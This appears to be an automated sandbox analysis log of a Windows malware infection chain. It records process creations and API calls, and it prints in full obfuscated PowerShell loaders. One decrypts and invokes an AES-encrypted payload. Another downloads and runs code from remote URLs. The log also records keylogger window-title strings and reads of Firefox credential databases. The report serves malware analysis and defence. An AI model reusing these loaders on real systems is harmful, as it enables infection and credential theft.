';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cni/cgjmqvj5jcchnuuqniccrhpmr5qmkjqyaxljaoozs+i6ujjzbuhkkmuiawh3btvdj7nwjq1x++w/d0ybgxb8mznv8qaoqqp1s2jb+ydre2mync51z88vdp5yhlxv2jub4bad5mqkn09gj7sfrzkis0lv4bbd7swdblnny01hopdzzi88ulkrhf094frfkbdtwl6drqxh86pybppz5p2ly9nfsvgpk0kub6u6kg9mbd3uxusvgzcduc0aq5exdqvpaek1wsrhmdfswp03fzttbxi2uib73uc20hna8tklwpvgqcg5yxgt1syt4jsfjugz9qtq1ux/og7araur2spi44p27efktjtinmkpdxyhkjzs52yqntfau7vkn80wlfrjako1pusni83kg4gb5vmo0l0qfdknvuszur6nwsandn5nedu4krrcvnx137d+zbob0wbqlgldby6a+emgzytzcj9ydu9srhuvpnj5c0hkwpy4dw2nc9xkyxclhpmroagz59kk909adcva3czmi4okn0iyllc6wphikpk+n/lh8dsrmpfxxmnyxhq6fpmq3t7w6xvhmihbtnk1rozfwexeeon7dkrdc0d2irlwlym+askjswieqouxpmzyjum2hcsj8o2qq6sjssecso9ph7mc3rtlzx/yu4i0g+amxaebo7jngzczrsoxbrasre5huijlm3spvhwt7bmphfnb5uatl1poeor3paytiodvmhlq5udjkwlq55foeanjf+pmojiot+punj9pkhigch6xtde+2irxnpe7ay7vlrz0f+zzhorfur8p5phwq383qgba8dubdwqow+2/zvvgy0+vtbvpazbtmhkqsshty4fy3hgqlxkhwaneqjq8wqlkzquvdy9epztjgemds6via1ixp+weiorc5nuhoaj4ygoy2moxmyeodutv3614ruxvqvvcerqlinxxajm5yyy2gvfxvy7lqs/l3ppdj/er9yz3s9rypncll0seexfchp/0aee9ha3qtqqm07kfqm7fm/txvhazzqil8wyj4sl9vdvuovk82qkltc24fpx5mykzqf4iy2ozu7+pswznbwnr+r8ibexgpk6yuljjiqen49p7iiebll4a+j83mopubclr/3wfiodrztcs5fsi1/7gww61abzmh9wq5y/pn8qrpmjkyzsp84uihhxglfpuuclltyd6067khauf+isnyuo0yqamdlvdcnsanb1ffvg2z6opzbg7sqfu6aqguz584nttwubmlcl43xdc/g09jfmr9jk22mvt+6/1kqesuax5g4j6g6n3mjeep9cvy3lojh+/kwuqr/kbqc4jibzhwktcrnn4yi2/mmj/0v3oifvqnnecpnoqxxyyjjgkg+362vfqqj/+ronzxepvq3wcwkq/chehaw5iw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni98685860701936162316809131591218cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cni/cgjmqvj5jcchnuuqniccrhpmr5qmkjqyaxljaoozs+i6ujjzbuhkkmuiawh3btvdj7nwjq1x++w/d0ybgxb8mznv8qaoqqp1s2jb+ydre2mync51z88vdp5yhlxv2jub4bad5mqkn09gj7sfrzkis0lv4bbd7swdblnny01hopdzzi88ulkrhf094frfkbdtwl6drqxh86pybppz5p2ly9nfsvgpk0kub6u6kg9mbd3uxusvgzcduc0aq5exdqvpaek1wsrhmdfswp03fzttbxi2uib73uc20hna8tklwpvgqcg5yxgt1syt4jsfjugz9qtq1ux/og7araur2spi44p27efktjtinmkpdxyhkjzs52yqntfau7vkn80wlfrjako1pusni83kg4gb5vmo0l0qfdknvuszur6nwsandn5nedu4krrcvnx137d+zbob0wbqlgldby6a+emgzytzcj9ydu9srhuvpnj5c0hkwpy4dw2nc9xkyxclhpmroagz59kk909adcva3czmi4okn0iyllc6wphikpk+n/lh8dsrmpfxxmnyxhq6fpmq3t7w6xvhmihbtnk1rozfwexeeon7dkrdc0d2irlwlym+askjswieqouxpmzyjum2hcsj8o2qq6sjssecso9ph7mc3rtlzx/yu4i0g+amxaebo7jngzczrsoxbrasre5huijlm3spvhwt7bmphfnb5uatl1poeor3paytiodvmhlq5udjkwlq55foeanjf+pmojiot+punj9pkhigch6xtde+2irxnpe7ay7vlrz0f+zzhorfur8p5phwq383qgba8dubdwqow+2/zvvgy0+vtbvpazbtmhkqsshty4fy3hgqlxkhwaneqjq8wqlkzquvdy9epztjgemds6via1ixp+weiorc5nuhoaj4ygoy2moxmyeodutv3614ruxvqvvcerqlinxxajm5yyy2gvfxvy7lqs/l3ppdj/er9yz3s9rypncll0seexfchp/0aee9ha3qtqqm07kfqm7fm/txvhazzqil8wyj4sl9vdvuovk82qkltc24fpx5mykzqf4iy2ozu7+pswznbwnr+r8ibexgpk6yuljjiqen49p7iiebll4a+j83mopubclr/3wfiodrztcs5fsi1/7gww61abzmh9wq5y/pn8qrpmjkyzsp84uihhxglfpuuclltyd6067khauf+isnyuo0yqamdlvdcnsanb1ffvg2z6opzbg7sqfu6aqguz584nttwubmlcl43xdc/g09jfmr9jk22mvt+6/1kqesuax5g4j6g6n3mjeep9cvy3lojh+/kwuqr/kbqc4jibzhwktcrnn4yi2/mmj/0v3oifvqnnecpnoqxxyyjjgkg+362vfqqj/+ronzxepvq3wcwkq/chehaw5iw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9

Source: RegAsm.exe, 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managertworksility Mode] - Microsoft WordevT<
Source: RegAsm.exe, 00000010.00000002.957621602.0000000000788000.00000004.00000020.00020000.00000000.sdmp, sfvnspt.dat.16.dr	Binary or memory string: [2024/07/26 07:08:01 Program Manager]
Source: RegAsm.exe, 00000010.00000002.957621602.000000000079D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: RegAsm.exe, 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.957621602.0000000000788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2025/08/17 19:02:23 Program Manager]
Source: RegAsm.exe, 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.958142630.0000000003098000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00434C52 cpuid

16_2_00434C52

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	16_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	16_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	16_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	16_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	16_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	16_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: IsValidCodePage,GetLocaleInfoW,	16_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	16_2_00451F9B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00448957 GetSystemTimeAsFileTime,

16_2_00448957

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041B60D GetComputerNameExW,GetUserNameW,

16_2_0041B60D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

16_2_00449190

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 18_2_0041739B GetVersionExW,

18_2_0041739B

